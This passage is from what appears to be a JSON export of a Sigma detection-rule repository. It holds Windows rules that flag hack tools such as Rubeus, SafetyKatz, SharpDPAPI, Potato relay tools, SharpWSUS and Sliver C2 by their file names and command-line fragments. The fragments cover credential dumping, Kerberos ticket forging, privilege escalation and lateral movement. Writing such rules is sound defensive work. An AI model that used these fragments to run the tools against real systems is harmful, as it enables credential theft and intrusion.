    "content": "title: HackTool - RedMimicry Winnti Playbook Execution\nid: 95022b85-ff2a-49fa-939a-d7b8f56eeb9b\nstatus: test\ndescription: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility\nreferences:\n    - https://redmimicry.com/posts/redmimicry-winnti/\nauthor: Alexander Rausch\ndate: 2020-06-24\nmodified: 2023-03-01\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1106\n    - attack.t1059.003\n    - attack.t1218.011\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '\\rundll32.exe'\n            - '\\cmd.exe'\n        CommandLine|contains:\n            - 'gthread-3.6.dll'\n            - '\\Windows\\Temp\\tmp.bat'\n            - 'sigcmm-2.4.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml",
    "content": "title: Potential SMB Relay Attack Tool Execution\nid: 5589ab4f-a767-433c-961d-c91f3f704db1\nstatus: test\ndescription: Detects different hacktools used for relay attacks on Windows for privilege escalation\nreferences:\n    - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/\n    - https://pentestlab.blog/2017/04/13/hot-potato/\n    - https://github.com/ohpe/juicy-potato\n    - https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes\n    - https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire\n    - https://www.localpotato.com/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-24\nmodified: 2023-02-14\ntags:\n    - attack.collection\n    - attack.execution\n    - attack.credential-access\n    - attack.t1557.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        Image|contains:\n            - 'PetitPotam'\n            - 'RottenPotato'\n            - 'HotPotato'\n            - 'JuicyPotato'\n            - '\\just_dce_'\n            - 'Juicy Potato'\n            - '\\temp\\rot.exe'\n            - '\\Potato.exe'\n            - '\\SpoolSample.exe'\n            - '\\Responder.exe'\n            - '\\smbrelayx'\n            - '\\ntlmrelayx'\n            - '\\LocalPotato'\n    selection_script:\n        CommandLine|contains:\n            - 'Invoke-Tater'\n            - ' smbrelay'\n            - ' ntlmrelay'\n            - 'cme smb '\n            - ' /ntlm:NTLMhash '\n            - 'Invoke-PetitPotam'\n            - '.exe -t * -p '  # JuicyPotatoNG pattern https://github.com/antonioCoco/JuicyPotatoNG\n    selection_juicypotato_enum:  # appears when JuicyPotatoNG is used with -b\n        CommandLine|contains: '.exe -c \"{'\n        CommandLine|endswith: '}\" -z'\n    filter_hotpotatoes:  # known goodware https://hotpot.uvic.ca/\n        Image|contains:\n            - 'HotPotatoes6'\n            - 'HotPotatoes7'\n            - 'HotPotatoes ' # Covers the following: 'HotPotatoes 6', 'HotPotatoes 7', 'HotPotatoes Help', 'HotPotatoes Tutorial'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate files with these rare hacktool names\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml",
    "content": "title: HackTool - Rubeus Execution\nid: 7ec2c172-dceb-4c10-92c9-87c1881b7e18\nrelated:\n    - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18\n      type: similar\nstatus: stable\ndescription: Detects the execution of the hacktool Rubeus via PE information of command line parameters\nreferences:\n    - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus\n    - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html\n    - https://github.com/GhostPack/Rubeus\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-12-19\nmodified: 2023-04-20\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1558.003\n    - attack.lateral-movement\n    - attack.t1550.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Rubeus.exe'\n        - OriginalFileName: 'Rubeus.exe'\n        - Description: 'Rubeus'\n        - CommandLine|contains:\n              - 'asreproast '\n              - 'dump /service:krbtgt '\n              - 'dump /luid:0x'\n              - 'kerberoast '\n              - 'createnetonly /program:'\n              - 'ptt /ticket:'\n              - '/impersonateuser:'\n              - 'renew /ticket:'\n              - 'asktgt /user:'\n              - 'harvest /interval:'\n              - 's4u /user:'\n              - 's4u /ticket:'\n              - 'hash /password:'\n              - 'golden /aes256:'\n              - 'silver /user:'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_safetykatz.yml",
    "content": "title: HackTool - SafetyKatz Execution\nid: b1876533-4ed5-4a83-90f3-b8645840a413\nstatus: test\ndescription: Detects the execution of the hacktool SafetyKatz via PE information and default Image name\nreferences:\n    - https://github.com/GhostPack/SafetyKatz\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-20\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SafetyKatz.exe'\n        - OriginalFileName: 'SafetyKatz.exe'\n        - Description: 'SafetyKatz'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_secutyxploded.yml",
    "content": "title: HackTool - SecurityXploded Execution\nid: 7679d464-4f74-45e2-9e01-ac66c5eb041a\nstatus: stable\ndescription: Detects the execution of SecurityXploded Tools\nreferences:\n    - https://securityxploded.com/\n    - https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-12-19\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1555\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Company: SecurityXploded\n        - Image|endswith: 'PasswordDump.exe'\n        - OriginalFileName|endswith: 'PasswordDump.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml",
    "content": "title: HackTool - PPID Spoofing SelectMyParent Tool Execution\nid: 52ff7941-8211-46f9-84f8-9903efb7077d\nstatus: test\ndescription: Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent\nreferences:\n    - https://pentestlab.blog/2020/02/24/parent-pid-spoofing/\n    - https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks\n    - https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing\n    - https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-23\nmodified: 2024-11-23\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1134.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SelectMyParent.exe'\n        - CommandLine|contains:\n              - 'PPID-spoof'\n              - 'ppid_spoof'\n              - 'spoof-ppid'\n              - 'spoof_ppid'\n              - 'ppidspoof'\n              - 'spoofppid'\n              - 'spoofedppid'\n              - ' -spawnto '\n        - OriginalFileName|contains:\n              - 'PPID-spoof'\n              - 'ppid_spoof'\n              - 'spoof-ppid'\n              - 'spoof_ppid'\n              - 'ppidspoof'\n              - 'spoofppid'\n              - 'spoofedppid'\n        - Description: 'SelectMyParent'\n        - Hashes|contains:\n              - 'IMPHASH=04D974875BD225F00902B4CAD9AF3FBC'\n              - 'IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E'\n              - 'IMPHASH=89059503D7FBF470E68F7E63313DA3AD'\n              - 'IMPHASH=CA28337632625C8281AB8A130B3D6BAD'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_chisel.yml",
    "content": "title: HackTool - SharpChisel Execution\nid: cf93e05e-d798-4d9e-b522-b0248dc61eaf\nrelated:\n    - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5\n      type: similar\nstatus: test\ndescription: Detects usage of the Sharp Chisel via the commandline arguments\nreferences:\n    - https://github.com/shantanu561993/SharpChisel\n    - https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-05\nmodified: 2023-02-13\ntags:\n    - attack.command-and-control\n    - attack.t1090.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SharpChisel.exe'\n        - Product: 'SharpChisel'\n    # See rule 8b0e12da-d3c3-49db-bb4f-256703f380e5 for Chisel.exe coverage\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_dpapi_execution.yml",
    "content": "title: HackTool - SharpDPAPI Execution\nid: c7d33b50-f690-4b51-8cfb-0fb912a31e57\nstatus: test\ndescription: |\n    Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.\n    SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.\nreferences:\n    - https://github.com/GhostPack/SharpDPAPI\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-26\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1134.001\n    - attack.t1134.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\SharpDPAPI.exe'\n        - OriginalFileName: 'SharpDPAPI.exe'\n    selection_other_cli:\n        CommandLine|contains:\n            - ' backupkey '\n            - ' blob '\n            - ' certificates '\n            - ' credentials '\n            - ' keepass '\n            - ' masterkeys '\n            - ' rdg '\n            - ' vaults '\n    selection_other_options_guid:\n        CommandLine|contains|all:\n            - ' {'\n            - '}:'\n    selection_other_options_flags:\n        CommandLine|contains:\n            - ' /file:'\n            - ' /machine'\n            - ' /mkfile:'\n            - ' /password:'\n            - ' /pvk:'\n            - ' /server:'\n            - ' /target:'\n            - ' /unprotect'\n    condition: selection_img or (selection_other_cli and 1 of selection_other_options_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_impersonation.yml",
    "content": "title: HackTool - SharpImpersonation Execution\nid: f89b08d0-77ad-4728-817b-9b16c5a69c7a\nrelated:\n    - id: cf0c254b-22f1-4b2b-8221-e137b3c0af94\n      type: similar\nstatus: test\ndescription: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively\nreferences:\n    - https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/\n    - https://github.com/S3cur3Th1sSh1t/SharpImpersonation\nauthor: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-27\nmodified: 2023-02-13\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1134.001\n    - attack.t1134.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\SharpImpersonation.exe'\n        - OriginalFileName: 'SharpImpersonation.exe'\n    selection_cli:\n        - CommandLine|contains|all:\n              - ' user:'\n              - ' binary:'\n        - CommandLine|contains|all:\n              - ' user:'\n              - ' shellcode:'\n        - CommandLine|contains:\n              - ' technique:CreateProcessAsUserW'\n              - ' technique:ImpersonateLoggedOnuser'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml",
    "content": "title: HackTool - SharpLDAPmonitor Execution\nid: 9f8fc146-1d1a-4dbf-b8fd-dfae15e08541\nstatus: test\ndescription: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.\nreferences:\n    - https://github.com/p0dalirius/LDAPmonitor\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-30\nmodified: 2023-02-14\ntags:\n    - attack.discovery\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\SharpLDAPmonitor.exe'\n        - OriginalFileName: 'SharpLDAPmonitor.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/user:'\n            - '/pass:'\n            - '/dcip:'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpersist.yml",
    "content": "title: HackTool - SharPersist Execution\nid: 26488ad0-f9fd-4536-876f-52fea846a2e4\nstatus: test\ndescription: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms\nreferences:\n    - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit\n    - https://github.com/mandiant/SharPersist\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-15\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\SharPersist.exe'\n        - Product: 'SharPersist'\n    selection_cli_1:\n        CommandLine|contains:\n            - ' -t schtask -c '\n            - ' -t startupfolder -c '\n    selection_cli_2:\n        CommandLine|contains|all:\n            - ' -t reg -c '\n            - ' -m add'\n    selection_cli_3:\n        CommandLine|contains|all:\n            - ' -t service -c '\n            - ' -m add'\n    selection_cli_4:\n        CommandLine|contains|all:\n            - ' -t schtask -c '\n            - ' -m add'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpevtmute.yml",
    "content": "title: HackTool - SharpEvtMute Execution\nid: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c\nrelated:\n    - id: 49329257-089d-46e6-af37-4afce4290685 # DLL load\n      type: similar\nstatus: test\ndescription: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs\nreferences:\n    - https://github.com/bats3c/EvtMute\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-07\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Image|endswith: '\\SharpEvtMute.exe'\n        - Description: 'SharpEvtMute'\n        - CommandLine|contains:\n              - '--Filter \"rule '\n              - '--Encoded --Filter \\\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml",
    "content": "title: HackTool - SharpLdapWhoami Execution\nid: d9367cbb-c2e0-47ce-bdc0-128cb6da898d\nstatus: test\ndescription: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller\nreferences:\n    - https://github.com/bugch3ck/SharpLdapWhoami\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-29\nmodified: 2023-02-04\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        Image|endswith: '\\SharpLdapWhoami.exe'\n    selection_pe: # in case the file has been renamed after compilation\n        - OriginalFileName|contains: 'SharpLdapWhoami'\n        - Product: 'SharpLdapWhoami'\n    selection_flags1:\n        CommandLine|endswith:\n            - ' /method:ntlm'\n            - ' /method:kerb'\n            - ' /method:nego'\n            - ' /m:nego'\n            - ' /m:ntlm'\n            - ' /m:kerb'\n    condition: 1 of selection*\nfalsepositives:\n    - Programs that use the same command line flags\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpmove.yml",
    "content": "title: HackTool - SharpMove Tool Execution\nid: 055fb54c-a8f4-4aee-bd44-f74cf30a0d9d\nstatus: test\ndescription: |\n    Detects the execution of SharpMove, a .NET utility performing multiple tasks such as \"Task Creation\", \"SCM\" query, VBScript execution using WMI via its PE metadata and command line options.\nreferences:\n    - https://github.com/0xthirteen/SharpMove/\n    - https://pentestlab.blog/tag/sharpmove/\nauthor: Luca Di Bartolomeo (CrimpSec)\ndate: 2024-01-29\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\SharpMove.exe'\n        - OriginalFileName: SharpMove.exe\n    selection_cli_computer:\n        # In its current implementation the \"computername\" flag is required in all actions\n        CommandLine|contains: 'computername='\n    selection_cli_actions:\n        CommandLine|contains:\n            - 'action=create'\n            - 'action=dcom'\n            - 'action=executevbs'\n            - 'action=hijackdcom'\n            - 'action=modschtask'\n            - 'action=modsvc'\n            - 'action=query'\n            - 'action=scm'\n            - 'action=startservice'\n            - 'action=taskscheduler'\n    condition: selection_img or all of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpsuccessor_execution.yml",
    "content": "title: HKTL - SharpSuccessor Privilege Escalation Tool Execution\nid: 38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8\nstatus: experimental\ndescription: |\n    Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments.\n    Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability.\nreferences:\n    - https://github.com/logangoins/SharpSuccessor\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-06\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SharpSuccessor.exe'\n        - OriginalFileName: 'SharpSuccessor.exe'\n        - CommandLine|contains: 'SharpSuccessor'\n        - CommandLine|contains|all:\n              - ' add '\n              - ' /impersonate'\n              - ' /path'\n              - ' /account'\n              - ' /name'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpup.yml",
    "content": "title: HackTool - SharpUp PrivEsc Tool Execution\nid: c484e533-ee16-4a93-b6ac-f0ea4868b2f1\nstatus: test\ndescription: Detects the use of SharpUp, a tool for local privilege escalation\nreferences:\n    - https://github.com/GhostPack/SharpUp\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-20\nmodified: 2023-02-13\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.execution\n    - attack.t1615\n    - attack.t1569.002\n    - attack.t1574.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SharpUp.exe'\n        - Description: 'SharpUp'\n        - CommandLine|contains:\n              - 'HijackablePaths'\n              - 'UnquotedServicePath'\n              - 'ProcessDLLHijack'\n              - 'ModifiableServiceBinaries'\n              - 'ModifiableScheduledTask'\n              - 'DomainGPPPassword'\n              - 'CachedGPPPassword'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml",
    "content": "title: HackTool - SharpView Execution\nid: b2317cfa-4a47-4ead-b3ff-297438c0bc2d\nrelated:\n    - id: dcd74b95-3f36-4ed9-9598-0490951643aa\n      type: similar\nstatus: test\ndescription: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems\nreferences:\n    - https://github.com/tevora-threat/SharpView/\n    - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview\nauthor: frack113\ndate: 2021-12-10\nmodified: 2023-02-14\ntags:\n    - attack.discovery\n    - attack.t1049\n    - attack.t1069.002\n    - attack.t1482\n    - attack.t1135\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'SharpView.exe'\n        - Image|endswith: '\\SharpView.exe'\n        - CommandLine|contains:\n              # - 'Add-DomainGroupMember'\n              # - 'Add-DomainObjectAcl'\n              # - 'Add-ObjectAcl'\n              - 'Add-RemoteConnection'\n              - 'Convert-ADName'\n              - 'ConvertFrom-SID'\n              - 'ConvertFrom-UACValue'\n              - 'Convert-SidToName'\n              # - 'ConvertTo-SID'\n              - 'Export-PowerViewCSV'\n              # - 'Find-DomainLocalGroupMember'\n              - 'Find-DomainObjectPropertyOutlier'\n              - 'Find-DomainProcess'\n              - 'Find-DomainShare'\n              - 'Find-DomainUserEvent'\n              - 'Find-DomainUserLocation'\n              - 'Find-ForeignGroup'\n              - 'Find-ForeignUser'\n              - 'Find-GPOComputerAdmin'\n              - 'Find-GPOLocation'\n              - 'Find-Interesting' # 'Find-InterestingDomainAcl', 'Find-InterestingDomainShareFile', 'Find-InterestingFile'\n              - 'Find-LocalAdminAccess'\n              - 'Find-ManagedSecurityGroups'\n              # - 'Get-ADObject'\n              - 'Get-CachedRDPConnection'\n              - 'Get-DFSshare'\n              # - 'Get-DNSRecord'\n              # - 'Get-DNSZone'\n              # - 'Get-Domain'\n              - 'Get-DomainComputer'\n              - 'Get-DomainController'\n              - 'Get-DomainDFSShare'\n              - 'Get-DomainDNSRecord'\n              # - 'Get-DomainDNSZone'\n              - 'Get-DomainFileServer'\n              - 'Get-DomainForeign' # 'Get-DomainForeignGroupMember', 'Get-DomainForeignUser'\n              - 'Get-DomainGPO' # 'Get-DomainGPOComputerLocalGroupMapping', 'Get-DomainGPOLocalGroup', 'Get-DomainGPOUserLocalGroupMapping'\n              - 'Get-DomainGroup' # 'Get-DomainGroupMember'\n              - 'Get-DomainGUIDMap'\n              - 'Get-DomainManagedSecurityGroup'\n              - 'Get-DomainObject' # 'Get-DomainObjectAcl'\n              - 'Get-DomainOU'\n              - 'Get-DomainPolicy' # 'Get-DomainPolicyData'\n              - 'Get-DomainSID'\n              - 'Get-DomainSite'\n              - 'Get-DomainSPNTicket'\n              - 'Get-DomainSubnet'\n              - 'Get-DomainTrust' # 'Get-DomainTrustMapping'\n              # - 'Get-DomainUser'\n              - 'Get-DomainUserEvent'\n              # - 'Get-Forest'\n              - 'Get-ForestDomain'\n              - 'Get-ForestGlobalCatalog'\n              - 'Get-ForestTrust'\n              - 'Get-GptTmpl'\n              - 'Get-GroupsXML'\n              # - 'Get-GUIDMap'\n              # - 'Get-IniContent'\n              # - 'Get-IPAddress'\n              - 'Get-LastLoggedOn'\n              - 'Get-LoggedOnLocal'\n              - 'Get-NetComputer' # 'Get-NetComputerSiteName'\n              - 'Get-NetDomain' # 'Get-NetDomainController', 'Get-NetDomainTrust'\n              - 'Get-NetFileServer'\n              - 'Get-NetForest' # 'Get-NetForestCatalog', 'Get-NetForestDomain', 'Get-NetForestTrust'\n              - 'Get-NetGPO' # 'Get-NetGPOGroup'\n              # - 'Get-NetGroup'\n              - 'Get-NetGroupMember'\n              - 'Get-NetLocalGroup' # 'Get-NetLocalGroupMember'\n              - 'Get-NetLoggedon'\n              - 'Get-NetOU'\n              - 'Get-NetProcess'\n              - 'Get-NetRDPSession'\n              - 'Get-NetSession'\n              - 'Get-NetShare'\n              - 'Get-NetSite'\n              - 'Get-NetSubnet'\n              - 'Get-NetUser'\n              # - 'Get-ObjectAcl'\n              - 'Get-PathAcl'\n              - 'Get-PrincipalContext'\n              # - 'Get-Proxy'\n              - 'Get-RegistryMountedDrive'\n              - 'Get-RegLoggedOn'\n              # - 'Get-SiteName'\n              # - 'Get-UserEvent'\n              # - 'Get-WMIProcess'\n              - 'Get-WMIRegCachedRDPConnection'\n              - 'Get-WMIRegLastLoggedOn'\n              - 'Get-WMIRegMountedDrive'\n              - 'Get-WMIRegProxy'\n              - 'Invoke-ACLScanner'\n              - 'Invoke-CheckLocalAdminAccess'\n              - 'Invoke-Kerberoast'\n              - 'Invoke-MapDomainTrust'\n              - 'Invoke-RevertToSelf'\n              - 'Invoke-Sharefinder'\n              - 'Invoke-UserImpersonation'\n              # - 'New-DomainGroup'\n              # - 'New-DomainUser'\n              - 'Remove-DomainObjectAcl'\n              - 'Remove-RemoteConnection'\n              - 'Request-SPNTicket'\n              # - 'Resolve-IPAddress'\n              # - 'Set-ADObject'\n              - 'Set-DomainObject'\n              # - 'Set-DomainUserPassword'\n              - 'Test-AdminAccess'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml",
    "content": "title: HackTool - SharpWSUS/WSUSpendu Execution\nid: b0ce780f-10bd-496d-9067-066d23dc3aa5\nstatus: test\ndescription: |\n    Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.\n    Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.\nreferences:\n    - https://labs.nettitude.com/blog/introducing-sharpwsus/\n    - https://github.com/nettitude/SharpWSUS\n    - https://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1\nauthor: '@Kostastsale, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2022-10-07\nmodified: 2024-08-23\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1210\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_wsuspendu_inject:\n        CommandLine|contains: ' -Inject '\n    selection_wsuspendu_payload:\n        CommandLine|contains:\n            - ' -PayloadArgs '\n            - ' -PayloadFile '\n    selection_sharpwsus_commands:\n        CommandLine|contains:\n            - ' approve '\n            - ' create '\n            - ' check '\n            - ' delete '\n    selection_sharpwsus_flags:\n        CommandLine|contains:\n            - ' /payload:'\n            - ' /payload='\n            - ' /updateid:'\n            - ' /updateid='\n    condition: all of selection_wsuspendu_* or all of selection_sharpwsus_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml",
    "content": "title: HackTool - SILENTTRINITY Stager Execution\nid: 03552375-cc2c-4883-bbe4-7958d5a980be\nrelated:\n    - id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d # DLL Load\n      type: derived\nstatus: test\ndescription: Detects SILENTTRINITY stager use via PE metadata\nreferences:\n    - https://github.com/byt3bl33d3r/SILENTTRINITY\nauthor: Aleksey Potapov, oscd.community\ndate: 2019-10-22\nmodified: 2023-02-13\ntags:\n    - attack.command-and-control\n    - attack.t1071\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Description|contains: 'st2stager'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml",
    "content": "title: HackTool - Sliver C2 Implant Activity Pattern\nid: 42333b2c-b425-441c-b70e-99404a17170f\nstatus: test\ndescription: Detects process activity patterns as seen being used by Sliver C2 framework implants\nreferences:\n    - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36\n    - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-08-25\nmodified: 2023-03-05\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_soaphound_execution.yml",
    "content": "title: HackTool - SOAPHound Execution\nid: e92a4287-e072-4a40-9739-370c106bb750\nstatus: test\ndescription: |\n    Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.\nreferences:\n    - https://github.com/FalconForceTeam/SOAPHound\n    - https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c\nauthor: '@kostastsale'\ndate: 2024-01-26\ntags:\n    - attack.discovery\n    - attack.t1087\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - ' --buildcache '\n            - ' --bhdump '\n            - ' --certdump '\n            - ' --dnsdump '\n    selection_2:\n        CommandLine|contains:\n            - ' -c '\n            - ' --cachefilename '\n            - ' -o '\n            - ' --outputdirectory'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_stracciatella_execution.yml",
